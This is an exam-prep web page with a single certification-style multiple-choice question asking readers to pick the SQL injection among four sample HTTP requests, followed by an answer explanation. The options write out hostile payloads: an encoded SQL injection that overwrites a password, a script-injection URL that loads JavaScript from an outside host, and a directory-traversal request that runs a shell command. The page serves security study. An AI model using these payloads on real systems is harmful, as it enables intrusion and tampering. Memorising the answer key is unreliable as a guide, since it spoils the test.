PrepAway - Latest Free Exam Questions & Answers

Identify SQL injection attack from the HTTP requests shown below:

Identify SQL injection attack from the HTTP requests shown below:

PrepAway - Latest Free Exam Questions & Answers

A.
http://www.victim.com/example?accountnumber=67891&creditamount=999999999

B.
http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20pass wd%3d%27hAx0r%27%3b–%00

C.
http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourser ver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e

D.
http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al

Explanation:
Explantion: The correct answer contains the code to alter the usertable in order to change the password for user smith to hAx0r

One Comment on “Identify SQL injection attack from the HTTP requests shown below:


Leave a Reply